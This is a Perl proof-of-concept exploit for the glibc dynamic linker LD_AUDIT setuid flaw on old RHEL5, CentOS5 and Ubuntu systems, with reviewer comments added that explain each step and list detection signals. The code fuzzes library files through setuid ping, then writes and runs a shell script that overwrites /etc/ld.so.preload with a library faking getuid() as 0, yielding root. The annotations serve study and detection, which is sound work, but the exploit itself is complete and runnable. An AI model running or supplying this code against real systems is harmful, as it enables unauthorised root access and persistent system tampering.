1 | #!/usr/bin/perl | |
# Reviewer's reading (defensive context): local privilege-escalation
# proof of concept against the glibc dynamic linker honouring LD_AUDIT
# while loading a setuid program (see the banner printed below).  The
# script (1) walks every file in @libdirs and pulls upper-case
# identifiers out of it with strings(1), (2) runs the setuid `ping`
# with LD_AUDIT set to that file and the identifier exported as a path
# under $tempdir, (3) treats any file that shows up in $tempdir as a
# hit, and (4) writes and executes spl.sh, which reuses the hit to
# overwrite /etc/ld.so.preload.  Current glibc releases ignore LD_AUDIT
# for setuid programs, so the value of this listing today is in
# recognising the pattern rather than in running it.
# Detection signals visible in this code: a burst of setuid `ping`
# executions with LD_AUDIT in the environment, many new files under
# /tmp/fuzz/, gcc compiling /tmp/getuid.c, and an unprivileged session
# writing /etc/ld.so.preload.
2 | use POSIX; | |
# POSIX is pulled in for ceil() (progress-bar step size, line 23).
3 | $ptxt=" | |
4 | ||
5 | [The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads] | |
6 | [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu] | |
7 | ||
8 | "; | |
9 | print $ptxt; | |
# Autoflush STDOUT so the progress dots appear as they are printed.
10 | our $old_fh=select(STDOUT); $|=1; select($old_fh); | |
11 | @libdirs=("/lib"); # you can add your own paths to lib folder here | |
12 | $tempdir="/tmp/fuzz/"; # temp directory | |
# mkdir is unchecked: a pre-existing /tmp/fuzz/ (possibly owned by
# another user) is silently reused.  Entries left there from an
# earlier run are also counted as "hits" by the scan at line 51.
13 | mkdir($tempdir); | |
14 | ||
15 | #make some ascii | |
# Count directory entries across @libdirs (minus "." and "..") to size
# the 50-dot progress bar.
16 | $total=0; | |
17 | foreach $libdir (@libdirs) { | |
18 | opendir(my $dir, $libdir); | |
19 | @lf = readdir($dir); | |
20 | closedir $dir; | |
21 | $total=$total+scalar(@lf)-2; | |
22 | } | |
23 | $step=ceil($total/50); | |
24 | $stepp=0; | |
25 | print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%"." "x6 ."80%"." "x6 ."100%\n"; | |
26 | print "\["; | |
# Fuzzing loop: one setuid `ping` launch per (file, identifier) pair.
27 | foreach $libdir (@libdirs) { | |
28 | opendir(my $dir, $libdir); | |
29 | @libfiles = readdir($dir); | |
30 | closedir $dir; | |
31 | foreach $libfile (@libfiles) { | |
32 | $stepp++; | |
33 | if ($stepp==$step) {print ".";$stepp=0;} | |
34 | if (($libfile ne ".") && ($libfile ne "..")) { | |
35 | ||
# Every printable string in the file; only lines that are entirely
# [A-Z_0-9] are kept as candidate environment-variable names.
36 | @dump=`strings $libdir\/$libfile`; | |
37 | foreach $dline (@dump) { | |
38 | if ($dline=~/^([A-Z\_0-9]+)$/) { | |
39 | chomp($dline); | |
# The candidate name is exported with a path under $tempdir as its
# value; a file later appearing at "$tempdir$libfile-$dline" is how a
# hit is recognised.  Output of ping is discarded and $ccc is unused.
40 | $ccc=`LD_AUDIT="$libfile" $dline="$tempdir$libfile-$dline" ping&>/dev/null`; | |
41 | } | |
42 | } | |
43 | } | |
44 | } | |
45 | ||
46 | } | |
47 | print "\]\n"; | |
48 | ||
49 | print "Fuzzing done. Thank you for using!\n"; | |
50 | ||
# Result scan: anything in $tempdir besides "." and ".." is reported.
# File names are split on the last "-" into library and variable name;
# the last existing regular file wins as the pair used below.
51 | opendir(my $dir, $tempdir); | |
52 | @fuzzList = readdir($dir); | |
53 | closedir $dir; | |
54 | $libToExploit="";$argToExploit=""; | |
55 | if (scalar(@fuzzList)>2) { | |
56 | foreach $fuzzFile (@fuzzList) { | |
57 | if ($fuzzFile ne "." && $fuzzFile ne "..") { | |
58 | my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/; | |
59 | print "Success: vuln lib - $lib ; arg - $param\n"; | |
60 | if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) { | |
61 | $libToExploit=$lib; | |
62 | $argToExploit=$param; | |
63 | } | |
64 | } | |
65 | } | |
66 | } else { | |
67 | print "Fail. No vuln libs found. Try another target ;)\n"; | |
68 | exit(); | |
69 | } | |
70 | ||
# Shell template.  EXP_LIBRARY / EXP_ARGUMENT are placeholders filled
# in at lines 81-82.  Side effects when run: /etc/ld.so.preload is
# created via the setuid ping, then overwritten to point at
# /tmp/getuid.so, which is built from /tmp/getuid.c.  Both /tmp files
# and the preload entry persist after the script exits.
71 | $shCode=qq(#!/bin/sh | |
72 | umask 0 | |
73 | LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping | |
74 | echo "[+] creating /tmp/getuid.so" | |
75 | echo "int getuid(){return 0;}" > /tmp/getuid.c | |
76 | gcc -shared /tmp/getuid.c -o /tmp/getuid.so | |
77 | echo "/tmp/getuid.so" > /etc/ld.so.preload | |
78 | ); | |
79 | ||
# Writes spl.sh into the current directory (bareword handle, unchecked
# open) and executes it immediately.
80 | if ($libToExploit ne "" && $argToExploit ne "") { | |
81 | $shCode=~s/EXP_LIBRARY/$libToExploit/gi; | |
82 | $shCode=~s/EXP_ARGUMENT/$argToExploit/gi; | |
83 | open(SH,">spl.sh"); | |
84 | print SH $shCode; | |
85 | close(SH); | |
86 | chmod(0755,"spl.sh"); | |
87 | system("./spl.sh"); | |
88 | print "Hehe.. Type 'su' and be awesome!\n"; | |
89 | }